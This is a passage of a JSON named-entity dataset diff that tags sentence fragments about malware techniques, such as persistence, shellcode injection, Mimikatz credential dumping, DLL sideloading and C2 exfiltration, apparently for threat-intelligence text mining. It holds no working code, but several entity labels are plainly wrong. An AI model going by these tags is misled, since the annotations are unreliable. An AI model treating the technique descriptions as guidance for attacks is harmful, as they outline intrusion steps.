"control", + "to", + "winness.exe,", + "to", + "the", + "startup", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "persists", + "by", + "means", + "of", + "a", + "registry", + "run", + "key", + "or", + "a", + "startup", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adding", + "a", + "scheduler", + "task," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "task", + "with", + "schtasks", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "all", + "three", + "intermediate", + "C2", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "possible", + "proxy", + "servers", + "(any", + "indicated", + "in", + "the", + "configuration", + "plus", + "system", + "proxies)", + "and", + "C2", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domains", + "give", + "attackers", + "the", + "ability", + "to", + "mask", + "malicious", + "traffic", + "as", + "legitimate", + "activity", + "within", + "the", + "company" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proxy", + "server" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "proxy" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "–", + "proxy", + "server", + "address", + "and", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proxy", + "server" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "and", + "sends", + "system", + "information" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "OS", + "uptime" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Operating", + "system", + "version", + "and", + "whether", + "it", + "is", + "32-bit", + "or", + "64-bit" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Computer", + "name", + "Name", + "of", + "running", + "module", + "PID" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shellcode", + "version", + "and", + "whether", + "it", + "is", + "32-bit", + "or", + "64-bit" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whether", + "the", + "OS", + "is", + "32-bit", + "or", + "64-bit" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "information", + "about", + "the", + "computer", + "name", + "and", + "OS", + "version", + "and", + "whether", + "it", + "is", + "32-bit", + "or", + "64-bit" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Network", + "adapter", + "IP", + "addresses", + "MAC", + "address", + "of", + "one", + "of", + "the", + "adapters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "List", + "of", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MAC", + "addresses", + "of", + "network", + "adapters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Collects", + "the", + "configuration", + "of", + "active", + "connector", + "instances", + "other", + "than", + "the", + "RPCConnector", + "and", + "RPCBindConnector", + "classes." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "collect", + "information", + "about", + "the", + "IP", + "and", + "MAC", + "addresses", + "of", + "the", + "infected", + "machine" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Username", + "and", + "workgroup" + ], + "ner_tags": [ + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "information", + "about", + "the", + "name", + "of", + "the", + "current", + "user" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transport-level", + "protocol" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Standard", + "TCP", + "connection" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "two", + "TCP", + "connections." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duplication", + "of", + "socket", + "with", + "TLS", + "connection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establishes", + "a", + "TCP", + "connection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "messages", + "are", + "exchanged", + "in", + "the", + "original", + "TCP", + "connection", + "(without", + "TLS", + "encryption)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KCP", + "protocol" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "uses", + "KCP", + "on", + "top", + "of", + "a", + "TCP", + "connection" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "three", + "ways", + "to", + "connect", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transport", + "protocol", + "3,", + "port", + "8443", + "Transport", + "protocol", + "2,", + "port", + "80", + "Transport", + "protocol", + "1,", + "port", + "8080" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TcpConnector", + "and", + "TcpBindConnector", + "are", + "classes", + "responsible", + "for", + "connecting", + "over", + "TCP", + "as", + "client", + "and", + "server" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transport", + "protocols", + "TCP" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RPC", + "(Pipe)" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Network-level", + "protocol" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "KCP", + "protocol" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "KCP", + "protocol" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "support", + "for", + "multiple", + "transport", + "protocols", + "for", + "connecting", + "to", + "C2", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "use", + "TCP", + "and", + "UDP", + "for", + "C2", + "connections" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AES-128", + "is", + "the", + "encryption", + "algorithm", + "used." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "AES-256-CBC;" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "encrypted", + "in", + "the", + "standard", + "way" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "in", + "the", + "backdoor's", + "standard", + "way," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "data", + "is", + "encrypted", + "in", + "the", + "standard", + "way" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "AES", + "for", + "encrypting", + "traffic", + "in", + "its", + "backdoors" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injectors" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "run", + "it", + "in", + "an", + "active", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "running", + "an", + "arbitrary", + "command", + "in", + "a", + "CHM", + "file", + "via", + "an", + "ActiveX", + "object" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "runs", + "in", + "a", + "new", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "injected", + "in", + "a", + "similar", + "way" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "into" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Crosswalk", + "and", + "Metasploit", + "injectors" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "inject", + "shellcode", + "into", + "the", + "process" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeDebugPrivilege" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "finds", + "the", + "API", + "functions", + "it", + "needs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "CryptoAPI" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptography", + "API:" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "a", + "ZwCreateSection", + "call" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "via", + "ZwMapViewOfSection", + "calls" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "a", + "method", + "from", + "the", + ".NET", + "assembly" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "HttpWebRequest", + "and", + "HttpListener", + "from", + ".NET", + "Framework", + "are", + "used", + "for", + "client", + "and", + "server", + "implementations" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RPCConnector", + "and", + "RPCBindConnector" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TcpBindConnector", + "and", + "HttpBindConnector" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TcpConnector/TcpBindConnector" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "CreateThread" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "uses", + "various", + "WinAPI", + "functions", + "to", + "run", + "malicious", + "shellcode", + "in", + "the", + "current", + "process", + "or", + "to", + "inject", + "it", + "into", + "another", + "process" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "finds", + "the", + "PID", + "of", + "the", + "target", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Current", + "processes", + "are", + "checked" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Name", + "of", + "running", + "module", + "PID" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "shellcode", + "into", + "it" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "shellcode", + "into", + "the", + "processes", + "explorer.exe,", + "winlogon.exe,", + "wmplayer.exe,", + "svchost.exe,", + "and", + "spoolsv.exe" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "archive", + "was", + "distributed" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "an", + "HTML" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "is", + "unpacked", + "from", + "the", + "CHM", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SFX", + "archive" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "three", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "contents", + "are", + "unpacked" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SFX", + "archiveWhen", + "unpacked" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "use", + "VMProtect", + "or", + "custom", + "packers", + "for", + "its", + "malware" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "send", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "the", + "library", + "Funny.dll" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "dynamically", + "loads", + "the", + "library" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "contains", + "the", + "library", + "mapistub.dll," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "dynamically", + "loaded", + "from", + "a", + "Base64", + "constant", + "defined", + "in", + "the", + "main", + "assembly." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "conditional", + "jumps", + "that", + "never", + "run", + "are", + "included" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "junk", + "instructions", + "and", + "inverted", + "conditional", + "jumps", + "(combinations", + "of", + "jle/jg", + "and", + "the", + "like)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "is", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wiping", + "traces", + "of", + "malware", + "from", + "the", + "system" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "saved", + "in", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "control", + "to", + "a.bat." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cleanup", + "script" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "cmd.exe", + "and", + ".bat", + "files", + "to", + "run", + "commands" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "phishing", + "messages", + "with", + "malicious", + "attachments" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "persists", + "on", + "infected", + "machines", + "by", + "creating", + "new", + "services" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "legitimate", + "utilities", + "to", + "load", + "DLLs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establish", + "C2", + "connections", + "via", + "a", + "peer-to-peer", + "network", + "of", + "infected", + "hosts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "support", + "C2", + "connections", + "via", + "an", + "external", + "HTTP/SOCKS", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "API", + "RegisterServiceHandlerA", + "then", + "SetServiceStatus,", + "and", + "finally", + "CreateEventA." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "abusing", + "API", + "calls", + "in", + "the", + "Operating", + "System." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "also", + "decrypts" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "decryption", + "routine" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "routine" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "AES", + "256", + "decryption", + "key", + "of", + "the", + "payload" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "strings", + "decoded", + "when", + "running" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "decrypt", + "the", + "payload", + "from", + "the", + ".dat", + "file", + "using", + "the", + "AES-256-CTR", + "decryption", + "algorithm", + "and", + "starts", + "to", + "execute." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "payload", + "in", + "memory." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "was", + "injected", + "into", + "a", + "SVCHOST", + "process", + "where", + "a", + "driver", + "location", + "pointed", + "to", + "the", + "config", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "it", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "process", + "injection", + "in", + "one", + "of", + "the", + "svchost", + "processes" + ], + "ner_tags": [ + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "themselves", + "into", + "Windows", + "Media", + "Player" + ], + "ner_tags": [ + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "code", + "in", + "a", + "process" + ], + "ner_tags": [ + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "had", + "removed", + "the", + "payload", + "file", + "from", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Where", + "in", + "the", + "beginning", + "of", + "the", + "campaign", + "the", + "adversary", + "was", + "sloppy,", + "during", + "the", + "last", + "months", + "of", + "activity", + "they", + "became", + "more", + "careful", + "and", + "started", + "to", + "remove", + "evidence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Besides", + "the", + "use", + "of", + "Mimikatz", + "to", + "dump", + "credentials," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "acquired", + "through", + "the", + "use", + "of", + "Mimikatz,", + "or", + "creating", + "LSASS", + "dumps," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "Mimikatz", + "and", + "dumping", + "lsass," + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "Mimikatz", + "and", + "dumping", + "of", + "lsass," + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "makes", + "use", + "of", + "the", + "technique", + "“DLL", + "Sideloading”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "When", + "the", + "executable", + "is", + "run,", + "the", + "DLL", + "next", + "to", + "it", + "is", + "loaded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "dll", + "is", + "run", + "using", + "the", + "command", + "“rundll32.exe" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "model", + "uses", + "the", + "persistence", + "technique", + "utilizing", + "svchost.exe", + "with", + "service.dll", + "to", + "install", + "a", + "rogue", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DLL", + "embeds", + "several", + "obfuscated", + "strings" + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "was", + "to", + "start", + "a", + "program", + "as", + "a", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DLL", + "is", + "used", + "to", + "create", + "a", + "malicious", + "service" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + ".", + "The", + "name", + "of", + "the", + "created", + "service,", + "“SysmainUpdate”,", + "is", + "usurping", + "the", + "name", + "of", + "the", + "legitimate", + "service", + "“SysMain”", + "which", + "is", + "related", + "to", + "the", + "legitimate", + "DLL", + "sysmain.dll", + "and", + "also", + "to", + "the", + "Superfetch", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversary", + "installed", + "custom", + "backdoor", + "as", + "a", + "service" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversary", + "launched", + "backdoor", + "and", + "some", + "tools", + "as", + "a", + "Windows", + "Service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command", + "line", + "dump", + "of", + "the", + "memory:", + "cmd", + "/c" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "When", + "running", + "the", + "file", + "from", + "the", + "command", + "line," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "some", + "cases,", + "batch", + "(.bat)", + "scripts", + "were", + "created" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "content", + "in", + "a", + "batch", + "script:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "exfiltration", + "of", + "data", + "on", + "the", + "system,", + "such", + "as", + "OS,", + "Processor", + "(architecture)," + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "WMI", + "activity", + "[T1546.003]", + "was", + "also", + "observed", + "to", + "execute", + "commands", + "on", + "the", + "systems." + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMI", + "was", + "used", + "for", + "running", + "commands", + "on", + "remote", + "systems" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "From", + "a", + "persistence", + "point", + "of", + "view,", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversary", + "ran", + "scheduled", + "tasks", + "for", + "persistence", + "of", + "certain", + "malware", + "samples" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "use", + "of", + "valid", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "they", + "were", + "looking", + "to", + "get", + "valid", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "gained", + "credentials", + "in", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "files", + "were", + "exfiltrated", + "over", + "the", + "backdoor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "data", + "was", + "stored", + "in", + "a", + "location", + "in", + "the", + "Internet", + "Information", + "Services", + "(IIS)", + "web", + "server", + "and", + "exfiltrated", + "over", + "HTTP", + "using", + "GET", + "requests", + "towards", + "the", + "exact", + "file", + "paths" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "exfiltrated", + "data", + "towards", + "a", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "the", + "data", + "was", + "gathered", + "on", + "a", + "local", + "system", + "using", + "the", + "backdoor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "and", + "the", + "rar", + "files", + "were", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrated", + "over", + "HTTP", + "using", + "GET", + "requests" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "traffic", + "to", + "C2" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "packet", + "data", + "was", + "customized", + "and", + "sent", + "through", + "a", + "POST", + "request", + "with", + "several", + "headers", + "towards", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "started", + "to", + "open", + "up", + "both", + "UDP", + "and", + "TCP", + "ports", + "to", + "connect", + "with", + "a", + "C2", + "server" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + 